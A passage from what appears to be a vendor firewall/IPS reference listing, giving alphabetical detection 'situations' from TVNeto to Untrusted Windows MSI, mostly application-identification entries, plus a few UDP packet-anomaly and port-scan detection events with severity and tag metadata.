Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

TVNETO

About this situation: TVNeto usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

TVUPlayer

About this situation: TVUPlayer usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-630-5211
Description: TVUPlayer is a software application for watching TV channels over the internet.
Back to top

Tweepi

About this situation: Application Tweepi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tweepi is Twitter tools provider designed to help marketers make sense of, manage, and even expand their Twitter reach.
Back to top

TweetDeck

About this situation: Application TweetDeck detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TweetDeck is a social media dashboard application for management of Twitter accounts. The Twitter tool for real-time tracking, organizing, and engagement.
Back to top

TweetMyJOBS

About this situation: Application TweetMyJOBS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TweetMyJobs is social and mobile recruitment and job distribution network matching job seekers with employers.
Back to top

Tweety-Mail

About this situation: tweety mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based email service
Back to top

Twig

About this situation: Twig usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: Twig is an PHP based groupware enabling package which provides many features that includes webmail, contact manager, meeting, scheduling, news, etc.
Back to top

Twilio

About this situation: Twilio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Twilio allows software developers to programmatically make and receive phone calls and send and receive text messages using its web service APIs.Source: Wikipedia
Back to top

Twinfield-Online-Accounting

About this situation: Application Twinfield-Online-Accounting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Twinfield is an international Web service for collaborative online accounting.
Back to top

Twitch

About this situation: Twitch usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1150-5242
Description: Twitch is a website network that allows broadcasting video online.
Back to top

TwitPic

About this situation: TwitPic usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1371-5242
Description: TwitPic is a website that allows users to post pictures to the Twitter microblogging and social media service.
Back to top

TwitSpark

About this situation: Application TwitSpark detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Deliver amazing customer service with Sparkcentral, the first channel-agnostic, enterprise customer engagement platform.
Back to top

Twitter Follow

About this situation: Twitter function that enables a user to add a connection.
Context: URL Application Context
Severity: 1
Tags: Social Web - Twitter, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Twitter function that enables a user to add a connection.
Back to top

Twitter Mail

About this situation: Twitter function that enables a user to send an email within the Twitter community.
Context: URL Application Context
Severity: 1
Tags: Social Web - Twitter, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Twitter function that enables a user to send an email within the Twitter community.
Back to top

Twitter Posting

About this situation: Twitter function that enables a user to post an update.
Context: URL Application Context
Severity: 1
Tags: Social Web - Twitter, Productivity Loss
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-805-5242
Description: Twitter function that enables a user to post an update.
Back to top

Twoo

About this situation: Application Twoo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Twoo is the place to chat, search, share photos and play fun introductory games.
Back to top

Twproject

About this situation: Application Twproject detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Twproject is a full featured web based project management software that gives you full visibility and control over your projects.
Back to top

Twtkr

About this situation: twtkr usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A Korean social networking and blogging site
Back to top

TX2-CONCEPT

About this situation: Application TX2-CONCEPT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TX2 CONCEPT is an edi systems provider of solutions designed for automotive, transport and logistics, optical and mass-market retailing industries. It offers technological solutions such as integrated edi, webedi, e-invoicing, data and price sheets.
Back to top

Tyler-Technologies

About this situation: Application Tyler-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Tyler Technologies is a provider of end-to-end information management solutions and services for local governments.
Back to top

TymeShift

About this situation: Application TymeShift detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TymeShift is a time tracking software for Zendesk. Ticket based integration with reporting and a 1-click install.
Back to top

Typeform

About this situation: Application Typeform detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Typeform develops an application software a platform that allows users to fill out forms online.
Back to top

TypePad

About this situation: TypePad usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-630-5211
Description: TypePad is a service for hosting and publishing weblogs and photo albums.
Back to top

uAttend

About this situation: Application uAttend detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Uattend-provides innovative time and attendance solutions that help businesses and organizations save money, streamline workforce processes and increase productivity.
Back to top

Uber

About this situation: Uber usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Uber is an app-based transportation network and taxi company headquartered in San Francisco, California, which operates in cities in many countries. The company uses a smartphone application to receive ride requests, and then sends these trip requests to their drivers.
Back to top

Uberconference

About this situation: Uberconference usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: provides a rich visual interface for conference calls.
Back to top

Uberflip

About this situation: Application Uberflip detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Uberflip is a Content Experience Platform that lets businesses create remarkable content experiences for every stage of the buyer journey.
Back to top

Uberstrike

About this situation: UberStrike usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This application is an online, multiplayer shooter game.
Back to top

Ubertags

About this situation: Application Ubertags detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UberTags' cloud-based Tag Management System helps clients launch and manage 3rd party code snippets while improving page load times.
Back to top

uberVU

About this situation: Application uberVU detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: uberVU is real-time social media marketing platform that shows brands what they need to know, now. Help social marketers learn about spikes, trends and influencers, engage with fans from a single dashboard and measure.
Back to top

Ubisoft

About this situation: Ubisoft usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-628-5211
Description: Uplay is a gaming service, providing multiplayer, marketplace and cloud data storage for Ubisoft products.
Back to top

Ubisoft-Uplay

About this situation: Ubisoft Uplay usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-566-5211
Last changed: sgpkg-ips-628-5211
Description: Uplay is a gaming service, providing multiplayer, marketplace and cloud data storage for Ubisoft products.
Back to top

UBS

About this situation: UBS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1238-5242
Description: UBS usage detected. UBS is an online financial service site.
Back to top

Ubuntu

About this situation: Ubuntu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-773-5211
Description: Ubuntu online services usage has been detected.
Back to top

Ubuntu-Developer

About this situation: Ubuntu Developer usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-630-5211
Description: Ubuntu Developer resources usage has been detected.
Back to top

Ubuntu-One

About this situation: Ubuntu One usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-773-5211
Description: This service allows users to store files online and sync them with computers and mobile devices, as well as stream audio from the cloud to mobile devices. Source: Wikipedia
Back to top

Ubuntu-Update-Service

About this situation: Ubuntu update service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-630-5211
Description: Usage of official Ubuntu update servers detected
Back to top

UCView

About this situation: Application UCView detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UCView is a provider of digital signage solutions, offering digital signage application servers and content management software.
Back to top

Udacity

About this situation: Application Udacity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Udacity, an online education platform, a type of online university that teaches the actual programming skills that industry employers need today, delivers credentials endorsed by employers, because they built them, and provides education at a fraction of the cost and time of traditional schools
Back to top

UDP_Checksum-Mismatch

About this situation: UDP packet contains wrong checksum
Context: UDP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies, SSM Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Vulnerability: Samba-Nmbd-Sys_recvfrom-Infinite-Loop-Denial-Of-Service
Description: The UDP datagram checksum is incorrect. This type of packet should not be generated nor accepted by the receiving host. UDP datagrams with incorrect checksum typically result from faulty networking devices or from random errors in the network communications. These packets should not be accepted or forwarded by the network devices or hosts. However, many systems do not validate the checksums of the received UDP datagrams if the checksum generation for outgoing UDP datagrams is turned off. Risk analysis: Risk varies between low and high. This could be an IDS evasion attempt. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

UDP_Packet-Length-Inconsistency

About this situation: UDP packet contains extraneous padding
Context: UDP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The IPv4 datagram payload length exceeds the UDP datagram length. TCP/IP implementations that follow the UDP protocol [RFC 768] should not generate such datagrams. These types of UDP datagrams typically result from faulty network devices or from random errors in the network communications. Risk analysis: Risk level is fairly low. Most relevant log fields: "IP datagram length" shows the IP datagram payload length. "UDP datagram size" shows the UDP datagram length. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

UDP_Packet-Too-Long

About this situation: UDP packet is too long to fit inside IP payload
Context: UDP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, SSM Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: A UDP packet could not be delivered to the application because the packet was larger than the socket's buffer. This situation might indicate a protocol error or it might indicate an attack. Note: By default, the socket buffer size for the SSM UDP Proxy is set to 9216 bytes. The default buffer size can generally handle payloads up to 8 KB. You can adjust this limit using the net.inet.udp.maxdgram Advanced Sidewinder Proxy Setting. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

UDP_Packet-Too-Short

About this situation: UDP packet is too short to contain UDP header
Context: UDP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The IPv4 payload was less than eight bytes, which is the required minimum to contain a UDP header [RFC 768]. The UDP datagram is corrupted. These types of UDP datagrams typically result from faulty network devices or from random errors in the network communications. Risk analysis: Risk level is fairly low. This could indicate an attack, as these corrupt UDP datagrams can cause some rare systems to crash, as in [CVE-2000-0279]. Most relevant log fields: "IP datagram length" shows the IP datagram length. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

UDP_Portscan_End

About this situation: The timewindow for UDP portscan events has ended
Context: Scan detection without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-610-5211
Description: This situation is sent after a UDP_Portscan_Started situation when the specified timewindow has been exceeded. The informational message field will show summary of the ports and hosts scanned.
Back to top

UDP_Portscan_Started

About this situation: UDP Portscan has started
Context: Scan detection without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-610-5211
Description: The threshold value for UDP portscan events within the specified timewindow has been exceeded. UDP portscan is in progress. A summary situation will be sent at the end of the timewindow.
Back to top

UDP_Scan_Started

About this situation: UDP scan started
Context: Scan Started Event
Severity: 4
Tags: Inspection
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Description: New UDP scan activity detected. A host has sent a number of UDP packets to closed ports, or ports that do not respond. Connection attempts from this originating host have matched the port scanning detection paramaters. Tracking of this port/host scanning activity has been started and will be reported in subsequent related events. Risk analysis: Risk level is high. Port scanning can be used as part of the information gathering process and it often precedes an actual attack. Most relevant log fields: "Attacker IP" shows the originating IP address of the port scan. The counters and limit fields show the detection thresholds that were exceeded. "IP source" , "Source port" , "Destination port" , and "IP destination" show the source and destination addresses of the latest datagram related to this scan.
Back to top

UKFast

About this situation: Application UKFast detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UKFast is a hosting provider that offers dedicated servers, cloud hosting, and colocation services in highly secure UK data centres.
Back to top

UL-Workplace

About this situation: Application UL-Workplace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UL's workplace health and safety software solutions provide industry-leading software and expertise to help you improve business performance and gain peace of mind in the critical areas of safety and health compliance, risk management, governance and culture.
Back to top

Ultimate

About this situation: Application Ultimate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ultimate Software specializes in HR software and HR payroll solutions that help improve company's human capital management and benefits administration.
Back to top

Ultra-Electronics

About this situation: Application Ultra-Electronics detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AEP Networks offers secure, optimised, end-to-end multi-bearer communication solutions. AEPs integrated portfolio of products includes identity-based network and resource access control, SSL VPNs, high assurance IPSec-based VPN encryptors, hardware security modules for key management and a range of products and communication solutions that connect remote locations with centrally-based core services.
Back to top

UltraDNS-Managed-Services-Portal

About this situation: Application UltraDNS-Managed-Services-Portal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Neustar UltraDNS allows ensure your website is always available, guaranteeing an effortless user experience, protect your DNS from outside threats with the most comprehensive security features in the industry, deliver the fast web site performance times that your users demand
Back to top

UltraProxy

About this situation: UltraProxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1128-5242
Description: UltraProxy is a free CGI-based web proxy that supports SSL. The service is used to bypass Internet filtering.
Back to top

Ultrasurf

About this situation: Endpoint Context Agent based Ultrasurf Connection
Context: EI Correlation
Severity: 1
Tags: Tunneling, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Ultrasurf endpoint application has been detected. Ultrasurf is a free proxy-based tool for internet privacy and security that allows users to bypass firewalls and protect their identity online.
Back to top

Ultrasurf

About this situation: Ultrasurf usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1814-5242
Description: Ultrasurf is a free proxy-based tool for internet privacy and security that allows users to bypass firewalls and protect their identity online. This application may not entirely identify/block older versions of Ultrasurf (prior to 13.03). This situation may trigger false positives on TLS connections made by Chrome directly to an external IP address.
Back to top

Umantis

About this situation: Application Umantis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Umantis provides the Haufe Talent Management Solution that allows cooperation between HR, management and employees.
Back to top

Unamo-SEO

About this situation: Application Unamo-SEO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unamo is a marketing suite. Gain more traffic, improve your rankings and leave the competition behind, analyze all your social media data in one place and compare with competitors, see how users interact with your website so you can improve conversion rates.
Back to top

Unauthorized Mobile Marketplaces

About this situation: Protects against websites that may distribute applications unauthorized by the mobile OS manufacturer, the handheld device manufacturer or the network provider. (Traffic visiting websites in this category may indicate jail-broken or rooted phones.)
Context: URL Application Context
Severity: 1
Tags: Information Technology, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Protects against websites that may distribute applications unauthorized by the mobile OS manufacturer, the handheld device manufacturer or the network provider. (Traffic visiting websites in this category may indicate jail-broken or rooted phones.)
Back to top

Unbabel

About this situation: Application Unbabel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Unbabel provides platform combines a approach to machine translation with a community of bilinguals and freelance translators which results in human quality translations.
Back to top

Unblock-Us

About this situation: Unblock Us traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-630-5211
Description: Unblock Us is a traffic redirection service designed to bypass geolocation based restrictions.
Back to top

Unblu

About this situation: Application Unblu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unblu is delivered as a SaaS service or as an on premise installation. Chat with customers, help close transactions.
Back to top

Unbounce

About this situation: unbounce usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Build, Publish and A/B test landing pages without I.T. A simpler and more streamlined workflow so that marketing team can focus on creating, publishing and measuring campaigns without the usual bottleneck associated with working with IT or developers.
Back to top

Unbxd

About this situation: Application Unbxd detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unbxd is a tech startup that helps e-commerce companies increase conversions with search and navigation, product recommendations.
Back to top

Uncategorized

About this situation: Sites not categorized in the Master Database.
Context: URL Application Context
Severity: 1
Tags: Miscellaneous
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites not categorized in the Master Database.
Back to top

Undefined RADIUS Client

About this situation: Dropping request because RADIUS Client is not defined
Context: Authentication Server situations
Severity: 6
Tags: SMC
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1296-5242
Description:
Back to top

Unfuddle

About this situation: Application Unfuddle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unfuddle is a hosted software development environment and project management solution for software development teams.
Back to top

Ungerboeck

About this situation: Application Ungerboeck detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ungerboeck Software is a dynamic solution for event, exhibition, venue management professionals that can unite people, data and event management processes.
Back to top

Unidentified Electronic Arts Application

About this situation: Endpoint Context Agent based unidentified Electronic Arts application detection
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description: An unidentified endpoint application signed by Electronic Arts has been detected. Electronic Arts develops games that can be accessed via the Origin platform.
Back to top

Unidentified Microsoft Application

About this situation: Endpoint Context Agent based unidentified Microsoft application detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1096-5242
Description: An unidentified endpoint application which was signed by Microsoft was detected.
Back to top

Unidentified Ubisoft Application

About this situation: Endpoint Context Agent based Ubisoft signed application detection
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description: An unidentified Ubisoft signed endpoint application has been detected. Ubisoft is a French video game company.
Back to top

Unidentified Valve Application

About this situation: Endpoint Context Agent based Unidentified Valve application detection
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1097-5242
Description: An unidentified endpoint application which was signed by Valve Corporation was detected. Valve Corporation is a company which produces video games and related software.
Back to top

UniFlip

About this situation: Application UniFlip detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UniFlip is a professional web software for publishers to convert PDF into flash and HTML5 and publish flipbooks, magazines, catalogs.
Back to top

Unify

About this situation: Application Unify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unify provides communications software and services firms. These solutions unify multiple networks, devices and applications into one easy-to-use platform that allows teams to engage in rich and meaningful conversations.
Back to top

Unison

About this situation: Application Unison detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unison gives you rooms: fast, secure spaces where a team can stay on the same page. Post updates, questions, files and more, then get feedback quickly. It let's dispersed teams stay in sync far better than they can with existing tools.
Back to top

Unit4

About this situation: Application Unit4 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unit4 Business Software creates, delivers and supports adaptable business software worldwide, delivered via the cloud or on-premise.
Back to top

Unitas-Global

About this situation: Application Unitas-Global detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unitas Global provides innovative private and hybrid cloud solutions worldwide to enterprise organizations seeking to focus on core business activities.
Back to top

United-Parcel-Service

About this situation: United Parcel Service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-599-5211
Description: United Parcel Service (UPS) is a global shipment and logistics company.
Back to top

UniteU

About this situation: Application UniteU detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UniteU provides digital commerce technology that drives conversion rates on device.
Back to top

Unitrends

About this situation: Application Unitrends detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unitrends offers seamless integration of physical, virtual, and cloud backup, replication plus disaster recovery.
Back to top

Unity Gaming Engine

About this situation: Endpoint Context Agent based Unity application detection
Context: EI Correlation
Severity: 1
Tags: Gaming, Endpoint
First detected in: sgpkg-ips-1128-5242
Last changed: sgpkg-ips-1128-5242
Description: Unity Gaming Engine endpoint application was detected.
Back to top

Universal-Compute-Xchange

About this situation: Application Universal-Compute-Xchange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UCX is an on-demand spot exchange created to trade the cloud. UCX brings buyers and sellers of the cloud to a centralized discovery marketplace.
Back to top

Unknown-Encrypted-Application

About this situation: Unknown Encrypted traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1350-5242
Description: The connection has high entropy, and it was not identified to use any known protocol.
Back to top

Unleashed-Software

About this situation: Application Unleashed-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Unleashed Software offers inventory management platform for the small, medium and enterprise market.
Back to top

Unless

About this situation: Application Unless detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Unless is a drop-in service that adapts your website to match the intent, vocabulary and sentiment of specific audiences.
Back to top

UNPCampaignManager.exe

About this situation: Endpoint Context Agent based UNPCampaignManager.EXE detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection launched by the Windows system process UNPCampaignManager.EXE was detected. UNPCampaignManager.EXE is used by the Universal Notification Platform feature.
Back to top

Unspecified Windows Metro App

About this situation: Endpoint Context Agent based Windows Metro App detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Description: A Windows Metro client application detected. Windows Metro apps, or Universal Windows Platform apps, are apps for Windows operating system starting from Windows 8 that do not run in a separate window but instead occupy the entire screen or take up a side of the screen. This client application detection triggers if the application was not identified as a more specific Windows app.
Back to top

Untrusted Windows MSI

About this situation: Untrusted Windows installer (msi)
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
